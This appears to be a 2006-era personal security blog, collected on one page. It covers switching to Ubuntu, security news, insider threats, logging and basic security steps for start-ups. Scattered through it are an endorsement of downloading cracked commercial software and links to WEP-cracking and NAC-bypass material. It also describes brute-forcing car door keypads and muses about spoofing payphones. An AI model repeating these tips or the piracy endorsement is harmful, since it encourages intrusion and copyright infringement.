This post started out with me wondering to myself where I should put Linux and work it into my daily life, up to listing my systems and the pros and cons...but I think I already just talked myself through my plan.

This will leave me my gaming system, a possibility for less intensive games on my laptop, and leave me other lesser-speed Windows 2000 laptops for other uses. My other desktop-class systems can then still be whatever, as they are just used in my lab.

First order of business though: clean off the XP laptop, back everything up that I need or want, take inventory of what I need to replace, and start to organize up my tools and tempfolder (a dropbox for all sorts of incoming things that I've not played with, tried out, or used enough to file them away to keep or delete).

An article posted on SecurityFocus quoted:

Building on a Wall Street Journal analysis of the 20 million search queries leaked by America Online that found "free" to be the most popular search term, SiteAdvisor warned that the results produced by such searches frequently lead to malicious Web sites.
"Often, so-called 'free' items are anything but free," the company, recently bought by security firm McAfee, stated in its advisory. "Free screensaver and games sites are notorious for bundling spyware and adware with downloads... Free e-card sites often share users' e-mail addresses with third parties and can lead to a never-ending influx of spam... Ringtone sites frequently lure consumers with misleading offers of free tones that ultimately lead to automatic enrollment in paid subscriptions."

I admit, back in the day free stuff used to be cool to download. These days, however, they are packed with spyware and other not-so-nice things. Always have to wonder, "why is this free, what are they hoping to get?" More often than not, to get something installed on your computer or get your "clicks" on their sites.

I honestly have more trust in downloading cracked commercial apps through my regular channels as opposed to free sites. However, when looking for legit free things, I put a lot of faith in SourceForge-hosted apps and anything from a website that looks like a real developer just offering out to the world some little tool he/she created to do something cool. Anything else like free screensavers and the like are just not really worth the time and effort and risk.

This is social engineering at its best, and most scariest. Just think if this guy had more important things to say, or was pawning himself off as speaking on behalf of someone or something more important. Wow.

NetworkWorld posted a rather good series of articles on the six worst security mistakes.

1. Not having a security architecture- I like this overview, but I would add the need for logging and reviews of logging, from syslog/snmp stuff to web logs, OS logs, etc. Sadly, none of the companies I have worked for have been big enough to trouble themselves with spending money on formal security architectures beyond what is done when the environments are built or enhanced. Policy and protections have been second place, at best, to functionality and getting the needs taken care of.

2. Not investing in training- This discussion was awesome and a lot of poignant stuff was mentioned. I liked the contrast of the benefit of employee training and what happens when untrained people make decisions.

3. Neglecting identity management- Since I've not worked in environments over with over 500 employees, I've not had to worry much about identity management. Sadly, gaining any type of knowledge here is difficult, as so many sources pretty much say, "you need identity management, here's kinda what it is" but never discuss what products work, what don't, pros and cons of each, or even how to properly implement it from user acceptance to technical specs. This is one of my biggest issues with a lot of trade mags, especially vendor/ad supported mags that otherwise get sent free. They talk in general terms without actually giving me, an IT doer, much substance. Someday I'd like to examine identity management systems, but so far I've not seen a need for it in current environments. If I could make my own home-brew setup with little costs (maybe a USB fob and open source software), I would love to add that to my projects list.

4. Ignoring the insider threat- Most articles talk about how the insider threat needs attention, but never explain what to do, even in the most elementary terms. This piece goes one step further than most by saying one should monitor employee network use, harden the internal network, use internal network IPS to filter at the switch level, review and test internal access controls, and limit explicit trust in pretty much everyone. This is a good start, but spending money on this can be difficult as not many people really want to think about insider attacks. HR and management like to trust their employees while IT security tends to distrust pretty much everyone. This is just a matter of having different viewpoints, and can be a hard topic to effectively discuss. I think I would add in that not just empoyee use should be monitored, but all internal system logs as well, especially for odd connections, failed authentications, IPS/IDS alerts, and mysterious local account creation. Internal routers and firewalls can help segment things quite nicely and put off the bear of hardening all systems, at least for a while.

5. Not protecting web appliances- This was a shaky article, but I like the identification of three levels to protect when it comes to web servers: the host (OS), the server infrastructure (IIS/Apache I believe he meant), and the web application. The host and the infrastructure or no-brainers, really. The web app is the dicey part. In my experience, infrastructure (network and sysadmin roles) is not married with application development, in fact, these teams tend to work in opposition to each other. Likewise, security tends to fall in the middle somewhere. Infrastructure may bring it up and even test it, but typically we are hands-off when it actually comes to code changes. Whenever talking about web site security strategies from an infrastructure viewpoint, defense in depth must always be used. Assume there will be vulnerabilities in the web app, and plan to mitigate them. If development and infrastructure work well together, it will be a cold day in hell... :(

6. Buying products with the most bells and whistles- This is an interesting item, and I think is a product of poor training, lack of time to make accurate assessments and decisions in the face of sales propoganda, and lack of having a security architecture or plan. Sadly, I often hear about how appliances are purchased and forced into an environment because some senior manager read about it in a magazine and demanded it, all without truly evaluating the needs, the best solutions, or determining if there is a need for more staff to properly manage. A spiffy buzzword logging device is useless if no one is looking at the log reports or investigating the reported issues.

This looks like a fun and well-written read, an illustrated guide to cryptographic hashes.

Sometimes these things are very useful, and sometimes admins should block access to them. The Your-Freedom site offers such a service to bypass content filters, firewalls, and proxies.

The wifi hog project. Not sure what to make of this, but gotta read it someday.

This study on insider threats in IT is a bit dated, but let's be honest. People don't get outdated. This study is amazingly detailed and very important even today, 10+ years later.

Here is some more interesting spy information and insider threat character analysis.

And here is a guide to insider threat risk assessment.

I finally tracked down this link to a HUGE collection of videos (mp4 format) available through BitTorrent of presentations at the 22nd Chaos Communication Congress (223c) in Europe. Will need a Torrent client like Azureus. I have already started downloading this and am not even 1/4th through the list and it is already taking up 12GB of space. Will also need QuickTime or an alternative to QuickTime (recommended).

Updated link: videos. Be creative with the URL and you can find past years. When in doubt, hit the root site.

Stream of consciousness amazes me. In addition, the stream by which we discover new experiences is fun too. Take for instance this quick journey.

I like hacking and computers and security. Recently, I found a bunch of movies from the 22nd Chaos Computer Congress lectures from late last year. One lecture was "The Realtime Podcast." The lecturer basically ran an actual podcast on stage, but the podcast consisted of him lecturing on how to do podcasting, the tools, styles, marketing, etc. His background music was really cool. Thankfully he acknowledged it as DJ L'embrouille. The music is just this really chilled out electronic/ambient mixes. Amazingly, he releases these to the public and can be downloaded. So now I have been listening to about 10GB of his mixes and loving every minute of it. This is awesome stuff to just have playing in the background while doing some computer work.

Now, if this guy had not released this stuff freely, would I have ever heard of him? Doubt it. Would I pay to see him in person? Yup...and that would be money in his pocket due to free Internet distribution. Wake up RIAA.

I've read this in a few places recently, in particular regards to security software and appliances, but this video of one of the TED talks by David Pogue ties that in with my own feelings of the lashback on computers and electronics and how things are just too damned complicated. Too many buttons, too many clicks, too many features I will never use. For some people they stomach it, for others, they abandon the tech. I know too many people who are abandoning computers and the Internet because of all the complications.

Well, simplicity sells, and the above-linked talk was very well-done. Take out features, don't cram them in. The company 37signals does this as well, and has been remarkably successful, as have other post-dotcom small software companies, and even large companies like Apple with the ipod. This world needs simplicity and to get back to basics as opposed to bolting on features. Google, while maybe not as simplistic anymore overall, still has the best, most-trusted, and simple web search. Do that one thing and do it well.

I look forward to security software and appliances taking note of this trend and offering just the one or two things instead of trying to package every security measure into one device or app. I think this is short-sighted and just a way to increase their market and market share. Instead of doing things well, overwhelm others by just out-featuring them to get into as many markets at once as possible.

Linux and Unix have done this well for years, decades. Simple programs with few bells and whistles that do their designed task and no more. To do more, you combine them with other equally streamlined tools. cat firewall.log | grep denied. That's the true beauty in *nix, the command line power and simplicity. Granted, this is a geek's take on it... :) At least in the *nix world, the techs like me can still milk our creative sides in using these tools together in complex and beautiful ways as opposed to being handed a huge soundboard with 209208 dials and switches to do god-knows-what and produce 45x more reports than I'll ever use.

I have posts on how to crack wep on most any other flavor, now to add Mac too!

If I can get my hands on a pix for educational purposes, I can play around with the capture command.

I have used Linux here and there in the past 5 years, but in the past 2 years, my experience has been drastically limited to livecds (which, in their own right, are really awesome anyway!). I've long wanted to get away from Windows since I know 95% of what I'll ever know about Windows XP and previous anyway, and I really want to use a Mac or Linux box as my main OS at home for various reasons.

I've never made the jump and kept putting it off due to this reason or that, most notably two major reasons: I wanted to play WoW, which is difficult for anyone on Linux, and I wanted easy wireless access that wasn't a bitch to configure, support, or install. Wireless support has gotten better in the past few years, and my laptop really is not nearly as fun to play WoW on as my resurrected gaming rig. So...all the big barrier reasons are gone!

This weekend I went out and bought a new laptop drive, 100GB. My plan was to dual boot Windows and Ubuntu Linux and also have some room to run a VM in Ubuntu and Vm another Windows install or two plus others. The reason to dual-boot is so that I can get true wireless on both OS, since any VM is going to think it is on a wired connection. More on this later...

So I swapped my drive and put in Ubuntu 6.06 desktop. I did an install, it performed a format on my drive and was done. I literally blinked a few times and figured something screwed up or the instructions were incomplete. I rebooted Ubuntu from the livecd, saw that I had missed nothing, and on a whim decided to reboot without a cd. Sure enough, Ubuntu started up just fine and had been installed on the HD just like that. Wham! That's the shortest install of an OS I've ever had!

The sad thing, though, is the Ubuntu partition support. It is basically an all-or-none approach and I didn't get much help or options in doing manual partitioning. Unfortunately, the automatic part made me use all 100GB of the disk for ext3. Hrmm..well, I guess I can live with that for now and just swap hard drives when I want to go Windows. I may have to add in a mini-project to see if I can get an external enclosure and boot from it, but that's another project.

So, Ubuntu was working. In fact, both my wired and wireless network cards were recognized immediately. I hooked into my wired network, got an IP address, connected to my wireless AP to get my WEP key (yes I use WEP because I practice breaking my own network with various tools...long story), and configured up my wireless. Big props to Ubuntu, as it took on the first try and I had wireless on Linux with zero blood and sweat. Wow!

Now, I'm swapping back and forth between my hard drives and Windows and Linux as I move all my tasks and things I do on Windows over to Linux one by one. Hopefully in the next week or two, I will be running Ubuntu 95% of the time my laptop is powered on. The only snag may be if I figure out how to most properly carve up my disk so that I can still dual-boot Ubuntu and Windows XP. This might mean installing XP first and using it to format the disk, then seeing if Ubuntu will limit itself to whatever space is still open. I'd like to just do about 35GB for Ubuntu (ext3), 15Gb for Windows XP (NTFS), and the rest for either shared space (FAT) or VMs.

Next steps: Opening up Synaptic to allow me to install packages from the universe and multiverse, finding the root password (yeah, go figure, I couldn't find it and it never asked me for one on the install?) so I can su up, and getting some common apps installed that I use on a daily basis, such as Thunderbird, gaim (or a Linux equivalent to gaim), and mp3 player. Now that I think about it, my ipod support may be all borked up now. I use winamp+ml-ipod to manage my ipod and music as opposed to iTunes, but thankfully that is a minor gripe. I'll live. :)

A recent theft from an ATM machine in broad daylight using a key sequence which unlocked the machine and allowed the criminal to reprogram it to dispense larger bills than it thought it was doing, has had plenty of follow-up.

While this issue may bring the idea to the minds of young people in some small groups of the nation, I doubt this will turn into some sort of crime spree. However, it does illustrate exactly the failings of computer network decades ago, and something that continues today in many electronics areas outside computer networks: default passwords. When a technician or operator installs electronic equipment like ATMs, it is very unclear whether they properly change default passwords or close any backdoors. Telephone boxes, ATMs, lighted road construction signs, and many more devices are frequently left with default passwords. The only protection is usually threefold, 1) A lock on the internal workings of the device, 2) obscurity by not publicizing the passwords and backdoors and manuals widely, 3) common human conscience to not do something criminal in public.

The hacking/phreaking community has known about these things for decades. ATM boxes are a very popular target and much of these issues have been long known. A lock can be picked, broken, or just plain left unsecured. Obscurity is not a protection when used alone, and hiding passwords, manuals, and basically not teaching no-qualified people how to use devices is not protection. Frequently, this is defeated by operators leaving the manual nearby or scrawling notes with passwords inside the box. Obviously, the conscience of the person is widely variable and some people will not be deterred by it.

It is only a matter of time before more things like this are discovered out and about in less technical areas of the world. These lie in the gray forgotten area when electronics started getting smarter and thus needed passwords for operations and the widespread security paranoia of computer systems with widely publicized attacks via a very efficient Internet medium. Also, many of these systems sit in an area between white collar workers and IT staff; a lost area that is as much ignored as actually forgotten.

To put this topic to bed in my mind, here is Apple's notice about wireless security updates. This hopefully will also put other people to bed who criticized and had panic attacks and panic fanboy defense when Maynor and Cache presented about wireless driver exploits and did so on a Mac. I love Macs as much as the next person, but please, don't cannibalize our own people. We need to encourage research, not hang it out to be stoned when it discovers something important against our favorite hardware/software or isn't fully disclosed like our mischievous hearts want. This whole situation ellicited passionate, emotional responses from many people (we should have seen that coming, with the Mac vs Windows vs Linux debates), including people who should be more disassociated due to our profession. That includes journalists and bloggers who completely misrepresented and had no comprehension of even a visual, video presentation and what the implications were. Unethical journalism (brought in large part due to the clashing and greying between proper journalism and amatuer bloggers) really did not help.

[ Update: Two more links just for me. First, Matasano's commentary on the new patch, and a link from a commentor about third party accreditation when you can't trust the researchers, the press, or the company. Excellent idea!! ]

At any rate, hopefully this is back to bed, and props to Maynor and Cache for putting their necks in the noose, whether for fame or public utility (I don't much care), at least this improves our awareness about wireless issues and improves the software and drivers that power it. Ignorance is not a security blanket.

Totally unrelated: Is Amazon.com dying? Their pages the past two days load like molasses, if at all. I wonder if they are weathering some attack or what?

I've used Linux in the past, Red Hat, SuSE, Slackware, Knoppix, and various other livecds, but have never been able to make it a regular box that I use 95% of the time. Hopefully this will change.

But first, I want to just out and say it: Linux is not ready for prime time. Not even Ubuntu. Unfortunately, Windows is far easier to wield and get things done on. It might be less secure, but this is the classic usability vs security relationship. Thankfully, Ubuntu is not just for the uber-geek elite anymore, and can be adopted by hardcore geeks and even casual geeks, but it is not ready for the average consumer or user, and has a long way to go.

What better way to compare the two than by keeping score. Now, keep in mind Ubuntu is going to win in the end, as Linux will for me. I plan to stick with it and hammer away at it until I'm firmly on the "other side." It might be painful, but this is just part of learning and becoming a better geek (read: IT professional).

The install, as stated before, was amazingly fast compared to any other OS I've run. I literally thought I was still running the livecd portion of Ubuntu when I first rebooted (Ubuntu +1). However, the partition options leave a lot to be desired. While Windows is simple with partitions, Linux has always been arcane with them and knowing how many you need and how to carve them up is, in my opinion, the single biggest detractor for new users to try out Linux. Right from the start, it is complicated and difficult and unknown. Many people put it down right there without really giving it a true try. Ubuntu is an all or "know it yourself" install. Either it takes the whole disc or pre-made partition, or you have to know what you're doing. Sadly, I don't, and many people won't either (Windows +1).

So, last night I went about making sure I could do the typical things I want to do. I first updated Ubuntu, which, like Windows, prompted me with a nag screen saying there were updates. Nice! The updates were relatively quick for having 170+ updates, and of course required no reboot (Ubuntu +1).

Synaptic is really cool, and I'm happy with it. One bad point though, is that you're stuck with Ubuntu's packages and you need a little bit more knowledge to open up the universe and multiverse to more downloads. But, I always have liked having a central repository for many programs, all of which are free (Ubuntu +2, Windows +1 [how many people really catch the universe/multiverse updates without work?]). My biggest complaint about Synaptic, though, is how easy it is to do something and say, "omg, wtf did I just do?" I did this by selecting some packages and not paying close attention to the required packages or things that needed removal. After walking away to pop in a movie, I came back and hit "Apply," only to see Ubuntu quickly remove some things. I have no idea what they were, but I hope they were not important. I have learned, however, that I really should do one thing at a time, and scribble down what is added and removed, at least until I'm comfortable with this process.

sudo gedit /etc/apt/sources.list add in: deb http://us.archive.ubuntu.com/ubuntu/ dapper universe deb-src http://us.archive.ubuntu.com/ubuntu/ dapper universe deb http://us.archive.ubuntu.com/ubuntu/ dapper multiverse deb-src http://us.archive.ubuntu.com/ubuntu/ dapper multiverse save, then: sudo apt-get update

And this is the second biggest issue people have with Linux, and myself: the installs. Windows has a huge boost here with automatic installers that take care of everything. You don't need to unzip things usually (and if you do, it's easy). You don't need to compile from source code. You don't need to hunt for packages that work with your OS flavor (Windows flavors don't run concurrently, there's really only one active one at any time now, not counting Server). You don't need to wonder what the executable is or how to run it, it appears automatically in your Start->Programs list. Ubuntu is not so helpful all the time. I installed about 10 different packages from kismet and airsnort to lxdoom and tcpdump. Over half the installed packages were installed, and then promptly hidden from me. They were not in the Application list nor did I find them in the filesystem. Granted, most of the ones now found seem to be command-line apps, but this is a huge hole for most casual users. "I installed lxdoom to play it, now it doesn't appear, what gives?" (Windows +1) Not only that, but at least Synaptic takes care of linked packages or things you need before something you want. Trying to track these down and align the planets just to install one program can be a huge headache in Linux. (Windows +1)

So, an OS that is going to be a "Windows killer" better do some basic things without fuss. Ubuntu's wireless works, Firefox is installed by default, Thunderbird is installed by default, but is not the default mail program and does require being added into the Application list (Windows Start->Programs list). I installed GAIM without problem and promptly got on my IMs without issue at all. (Ubuntu +1 Windows +1)

I then popped in a DVD. Totem, the default media player threw an arcane error. Ok, I didn't want Totem anyway. So I installed mplayer. It also threw an error, even more arcane than the first. I then installed Ogle and Xine, both of which also could not read my DVDs. Wow. I did some research and it turns out encrypted DVDs are just enough of a closed format that Ubuntu decided not to include the ability to play them out of the box, or even after installing new players. In fact, I couldn't find the libraries I needed in Synaptic. D'oh. I found libdvdread3 jus fine, but libdvdcss2 had to be downloaded from some guy's FTP in Sweden. (Windows +1)

use synaptic to get libdvdread3 install libdvdcss2: sudo /usr/share/doc/libdvdread3/examples/install-css.sh

Whoa, wait a minute here...what version did I just download? What command did I have to run to make it work? I have to download some weird library that may or may not be 2 years old from some guy's FTP site in Sweden? I did more searches and found more German and other foreign sites, none of which looked commercial. This is the kind of thing in Windows that we, as security people, work to avoid: downloading from sites that make us stop and get paranoid about. (Windows +1)

After putting in the new library, though, all the players could play my DVDs without problem (I think I like the Xine interface best, but it doesn't fill my whole screen, sadly...which may be a graphics driver issue, but with the player...). However, this sort of hassle and *need* to Google up and understand uber-geek Linuxspeak to get it to work is going to keep Ubuntu from being used by my parents and friends. (Windows +1)

So that is where I stand right now. I can do most of the things I want to do on a daily basis (email, web, IM, and accessing my external drives for media like music, and dvd playing [with effort]), but where Ubuntu makes up ground on Windows in the install and ease of deployment, it loses ground in the places Linux has always lost ground: packages, not doing the necessary things out of the box, and needing to put on the geek cap just to work around things. Does Windows necessarily do this better? Perhaps not, but at least 99% of the computer-using world is used to it.

The score appears to be about how I expect, with Windows leading at this point, because this is all the hard, preventative stuff from Linux and Ubuntu so far. Windows 8 Ubuntu 5.

I diss on the blogosphere a lot for being bad reporters of news, but great reporters of experience and opinion (which in a way is news as well). I guess the difference is journalists have a level of ethics to maintain whereas bloggers can basically do whatever the heck they want.

Anyway, one question I had in my head lately are the career writers. There are bloggers and journalists in IT that I sometimes see or read and I frequently look at their bios or background, just to see where they are coming from. Often, I see they have 15-20 years of writing about IT and journalism and papers and 15+ books written or contributed to.

I don't get this sometimes. Are they career writers? Do they actually do any IT stuff either in an enterprise or at least at the consumer level? Or do they just play at home, talk to others more knowledgable, and just write about it? Those people kinda bug me...

This is just a little bit old, but there are still plenty of cars that sport the numbered keypads to unlock the driver's side door. There are really only 5 keys here, and thinking outside the box, one can quickly test that this is just a password entry, but there is no end bit or anything. It just sits and listens and waits for the proper combination no matter what preceeded it or followed it. Turns out, it only takes 3129 keypresses max to get the door to open. The article states this takes about 20 minutes. Just imagine reciting the cheat sheet into a recorder like an ipod and then just listening to the sequence as you key it in.

The more I think about it, the more it makes sense that this whole idea didn't last very long and not all that many cars used it or still use it.

Now this is a really fun-sounding idea for a metro game: players attempt to control as many payphones in an area as possible by calling from the phone to a central scorekeeper. The link gives plenty of information. This isn't necessarily something to be done in say, my state of Iowa, but would be amazingly fun in a very payphone-heavy metro area. What would be most interesting, though, is seeing how it is set up and run. Checking out the Asterisk setup behind the scenes, as well as how the payphone signatures are determined. I wonder if a game like this can be devised for DefCon? I wonder if payphone signatures can be spoofed such that a player can just adjust the variable and keep calling back from one phone?

Now what about expanding this to, say, the entire city of New York in a never-ending game where you can call up at any time? What about doing this for wireless hotspots or networks? Granted, you can spoof your IP and stuff, but what about needing to maintain a solid session with a central server from a wireless network, and submit data about that network? And note that I'm not saying open, public wireless networks... This whole idea is similar to a capture the flag competition, only mixing physical movement along with travesing the digital landscape. All the more reason to move to a more urban location. ;-)

I started read this article about Windows XP just to fill time, but by the time I got to the second page, I was noticing some subtle and poignant things being said.

The initial simplicity [of Windows XP] almost never survives contact with software installers. Most of them ignore Microsoft's programming guidelines by dumping shortcuts and icons across the Start Menu, the desktop and the "tray," that parking lot of tiny icons at the bottom-right corner. Good luck finding anything on the screen after you've let the likes of AOL Instant Messenger or RealPlayer have their way with XP.
With all that extra software, Microsoft needs to persuade other companies to play by its rules, but it's had trouble getting even its own programmers to do that. The mere presence of Windows Vista can't change this failure to communicate.

From device drivers to installed software, it all basically does whatever it wants to do, due to Microsoft's approach to system architecture. I am fully convinced that Windows is a product of consumer usability, and not of any intelligent security design or means to be solid and stable and loved for decades. Now, whether that is good or bad is another story, as Microsoft has grown rich and huge for those choices.

The operating system has done little to ensure that programs move in and move out in an orderly manner; they can throw supporting files and data all over the hard drive, then leave the junk behind when software is uninstalled. As a result, something that should have been fixed in Win 95 -- the way Windows slowly chokes on the leftovers of old programs -- remains a problem.

This is all too true, but again, what alternative is there? And with moving forward in Vista, how exactly will that fix everything? So many programs are bound to act funky or outright break with the new OS. People who have paid for these programs will clamor for support with upgrades (which thankfully software vendors have gotten consumers used to purchasing these upgrades). But, in the end, turning this huge ship that is a Windows-based community around is not going to be easy, or maybe even possible with the Windows OS architecture.

Imagine having Windows running so many important things for years, or even 20 years from now. The world is also becoming more PC-literate, but you can bet that 99% of all the next generation users are growing up with Windows, as opposed to other OS flavors, although I will give that next-gens will be better able to adapt to other OS options if they so chose to. This means that there is a very real threat to *nix servers and tools that they will slowly be bred out of existence (of note, putting *nix into the hands of developing countries can then be both a saving grace or also further stratification...).

Hopefully Windows gets some things right with Vista, but somehow I really doubt it. XP was a major step for Microsoft and it has lasted 5 years during the stabilization of the PC in our daily lives, young and old. I think it will look prettier, be larger, be more complex, will have more layers and layers of cool graphics and security apps, but it all just covers the same buggy and outdated architecture underneath.

At least it still means job security. :)

Holy crap, this paper on security checker tools for web apps is huge!

This paper discusses bypassing NAC systems. The presentation is also available.

HostGator was apparently not alone. At least two other companies had reportedly also been hit with the attack, an exploit for a previously unknown--or "zero-day"--vulnerability in a popular Web-site management application known as cPanel. (SecurityFocus)

One thing that scares me about many companies is their propensity to have what becomes a highly heterogeneous environment with lots of little things purchased and installed or freely downloaded and implemented in their environments, sometimes circumventing IT involvement. And one little thing like a third-party web-based app can cause an entire server or network to become owned and jeopardize a company's existence.

I had more of a purpose for this post, but I ended up turning myself in circles. Homogenous environments vs heterogeneous environments, simplicity vs defense in depth, all-in-one devices vs separation of duties...

In the end, companies simpy have to keep control of what they install and run in their networks, especially Internet-facing exposures, and maintain a process (with proper staff devoted to it) to keep up to date with patches and alerts for those exposures. While OS patches and "big" apps like Apache and OWA are typically tracked, far too many little things that slowly seep into the network landscape get overlooked. That ticket management system that was put in 2 years ago, or that survey "engine" on the corporate web site, or how about that php bulletin board that isn't hasn't had an update in 12 months. What about that port that was demanded to be opened 3 years ago to allow a temporary FTP server that was never cleaned up? Does marketing really need that nifty new tool on the web site, or WebDav turned on because that's the only way their contracted, at-home employee knows how to update websites?

While I like to call some of those things "network relics," I think I will also start applying a term, "network creep," to all the various little things that slowly make their way onto or into the systems and network that IT manages. This creep slowly expands the exposure for a company and unless there is strong change management, follow-up, and staffhours to devote, these creeps turn into relics.

Policy and processes (retirement of systems and apps...). Inventory and documentation. Standards. Logging and monitoring. Staff. Change management.

I'll stop now before I get to rambling too much more.

Tate over at ClearNet Security made a post about a friendly debate over the top 5 things a start-up company (read: small company) can do to start out the right way in regards to a safer computing environment. I thought this would be a good exercise in determining what my own top 5 recommendations to a similar fictional company would be. Granted, doing a top 5 instead of a top 6 or however many top picks it takes to do security right is a little limiting for no real reason, but this limit does help focus a bit more. This can also act as a general checklist for consultants or any outsourcing of solutions a start-up does, especially ones without in-home IT staff. I also try recommend free solutions as a starting point, especially for small companies without IT budgets.

1. Backups. This is the #1 thing to do to keep a business alive and running. My underlying assumption is that incidents will occur. If you don't have data backups, you will not survive many larger incidents. A requirement would be offsite backups, even if it is just at the CEOs home and maybe the CFOs home. Everything else for security should be dropped until this is done. Backups can be as simple as some batch files like Robocopy dumping data onto firewire or USB drives every night, with manual swapping of cables every day or week. Desktop systems can be set to perform regular system backups to a central storage if need be. Test backups regularly, test restore procedures regularly to ensure that they are working and to keep someone knowledgable about the process. Make sure workers copy important data to central servers every night or Friday, or a location that is backed up. Having even an elaborate file server and backup scheme is defeated internally if users keep their data on their systems and those systems are not backed up themselves.

2. Network firewall on the Internet link. Put up a network firewall on the Internet link and be draconian in the rules. Default Deny, and limited access elsewhere, even if it means nearly zero access from the outside. Small start-ups might be able to contract out to a local Linux expert or friend of the company to throw in a largely free Linux solution. Something like SmoothWall/IPCop may be better, as a slightly tech-savvy worker may be able to understand and work the web-based configs better than Linux iptables and such. But, if possible, invest in a Cisco Pix or Juniper NetScreen or Windows SMS/ISA solution and contract someone to set it up for you.

3. Desktop Antivirus. Evaluate some robust and light-weight products for Antivirus protection. For the most protection, I would not pick Norton of McAfee (most malware that is truly dangerous looks for and disables them anyway), but rather look into Kaspersky or F-Secure instead. For freeness, AVG and ClamWin are decent enough. A good case can be made for network-based Antivirus on the gateway in a smaller company, but most new desktop/laptop systems come with host-based AV anymore, so may already get half done without the extra burden. Obviously, the apps should be set to regularly scan the systems, automatically clean/delete, provide realtime scanning and stopping of virus execution, and be set to update no more than daily, every 8 hours if possible.

4. Patch Management. Turn on your Windows Automatic Updates to force installation upon a subsequent reboot. Try to do this with Office if at all possible. Updates should be done as soon as possible, preferably once a week on a Thursday or Wednesday. Workers should regularly do manual updates, even if it just verifies that automatic updates are working just fine.

5. Man, the dreaded last spot. Do I use physical security here, as losing the time and equipment for a small company can cost dearly? I guess when it comes down to such a short list, I have to look at what will best help the company survive and prosper to a point where the luxuries of security can be afforded. I would side with physical security here. Make sure doors are locked properly and possibly invest in an alarm system. If the company is in a business park, get to know the security stance of the business park owners and possibly work with them to provide for alarms or anything else they may do for you. If possible, lock down all systems at the desktop and secure any server equipment behind another locked door or at least out of sight behind some other door. The costs of these protections far outweighs the loss incurred in their absence.

I will cheat and put in a 5.5, since it is not only dealing with security, but insurance purposes as well. Inventory all systems and keep that up to date. This can just be some spreadsheet available with dates of purchase, serials, hardware details, software licenses, etc. Starting this early helps. Inventory can be morphed into talking about baselining an environment. Know what you have and what is normal in your environment. What systems are expected, what software is expected, what sort of traffic levels you expect, what log entries are normal. This baseline effort can then lead to quickly recognizing when something is abnormal and needs investigating.

A really close next consideration is to acquire desktop/security help either with some low-cost outsourcing or just hire a guy internally to manage systems, clean spyware, try out new software, help test new products, etc. This can help provide a company with someone to turn to for slightly more authority than your average user, and help a budding IT professional get his chops cut on some real experience. There are plenty of IT professionals out there who would be glad to consult either on the side of their daytime gig (be open to only getting support outside business hours) or add you as part of their already established clientele.

Lastly, if the small company insists on a wireless network, then I have to include wireless security as part of the list. The wireless network must not remain open and needs to be protected using WPA. Yes, this might be a hassle with visiting guests and potential clients, but the consequences of some high school kid driving by and mucking in your network can be dire.

A Canadian article discussed the results of an IT security survey. A couple blurbs caught my attention.

According to the 2006 Global State of Information Security survey, 53 per cent of Canadian companies surveyed said their reputation was driving their information security spending. The global average was 41 per cent.
"Poor information security that loses data such as customer profiles can seriously affect a company's brand," says Greg Murray of PricewaterhouseCoopers. "The cost of handling the public relations issues associated with losing customer identities can be devastating."

Now, while companies are economic entities, and realistically, this may be the real deal honest truth when execs look at IT security and the effects, I can't help but think of how unethical this attitude seems to be. So, in the absence of a government forcing disclosure of losses, these companies would not divulge the information. In addition, if customers do not care or the company would not be affected financially, they wouldn't disclose it. That attitude is also degrading to security/IT staff for those companies. "I only do good just because it helps me avoid getting into trouble." It's a classic example of negative reinforcement. I would prefer that we didn't need that reinforcement and that the actions were done ethically due to the company just being that way. But that may be way too idealistic of me to expect... (Then again, avoiding negligence issues can also be the same way, so maybe I'm being nitpicky on something I really should not be...quite likely in fact, so I will strike this whole paragraph, but leave it for future reference by me.)

Mr. Murray was surprised to find that 61 per cent of Canadian respondents surveyed have limited or no security training for the end-users of technology their employees.

Training is a fun debate and can go both ways. Fundamental training should be necessary for employees. I've known way too many people who truly didn't know something like surfing web pages willy-nilly was bad, and they were genuinely receptive to the information. Some of whom may even have changed their behaviors due to the new knowledge. But much like teenage pregnancy and drug use and various crimes, you can only inform the "general public" so much. Security will not become suddenly solid when all users are given excessive amounts of training in the workplace. I mean, if that were possible, perhaps we could have had a much different president these past 6 years if we had just informed the US public more? ;-)

For want of a nail, the shoe was lost; For want of the shoe, the horse was lost; For want of the horse, the rider was lost; For want of the rider, the battle was lost; For want of the battle, the kingdom was lost; And all for the want of a horseshoe nail.

For one missed log entry or one shortcut taken...

Brian Krebs, WashingtonPost.com, writes:

...far too many sites are compromised each month by hackers and scammers while their owners remain completely oblivious or in denial.

Logging and monitoring are hugely important, especially for catching break-ins and data theft. Data destruction is easy to see, but data theft is just copying data silently.

IT and business are becoming more and more enamored with feeling secure, or rather the attitude of, "We'll look at the logs when something bad happens or we suspect something bad has happened," which really means, "If we don't look at the logs, nothing's wrong, so let's just go about our business." Or a company will throw in an IDS/IPS device or log parser, but not devote the on-going manhours or staff to properly understand the device and be able to accurately monitor/parse while also being given ample time to investigate and acknowledge the various alerts.

Data theft will not necessarily get better soon. Large-scale regulations like PCI and others are really pushing the standards higher, but they are still ambiguous at times, and can make companies look better on paper than they really are in practice. Legislature and laws on disclosure of breaches has only really results in negative reinforcement for business, but a feeding frenzy for media as companies and agencies now have to divulge incidents that have always been happening anyway. This makes it seem like it is on the rise, when in fact we're just getting the problem more out in the open finally. I don't see this dying off for at least another 6 years. Once all the big businesses are shored up, we'll see tons of smaller businesses like those mentioned in the article posted above.

I foresee for a number of years, yet, businesses stepping as lightly as possible on this issue. Doing just enough to avoid negligence and satisfy regulations, but not enough to really have to admit to any problems or divule them. "Yes, we log and monitor, but we don't see anything, so everything is a-ok! I'm sorry you had your data stolen, but we do what we can, so better luck next time."

While this may feel good today, this is not a scalable or sustainable approach.

From my vantage point in IT, I can also say that logging and monitoring and even security are not high on the lists of execs to spend money on, managers to raise issues about, or staffers to spend time on. Our #1 priority is making sure the network and systems are up for the company. This can be 100% time utilization. Our #2 priority tends to be projects that either enhance the functionality (not security necessarily) of the current network and systems or projects that are directly related to revenue-generating people or processes or clients.

Security is not yet up there, let alone logging and monitoring and responding to those logs in an ethical fashion. This is true also of software and web application developers. Functionality and deadlines and bottom-lines first, then maybe performance. Security added later (and too often just never added).

Companies and home users are definitely different entities with different approaches to computer security. Not only are some of the items different, but the solutions as well. What is important to a business may not be important at all to a home user, and the reverse is true as well. Home users value system performance, ease of use, stability, security of their personal data, and security with their identities. Home users can both be the hardest to break into and the easiest to break into, from a security standpoint.

Not every home user is technically inclined or even wants to learn to use new programs and such for being secure. For this reason, many of the best pieces of advice for home users is behavioral. Rather than "learn Linux and implement a highly guarded firewall" most users will read that and not even try. That's just too much effort to ask of most people.

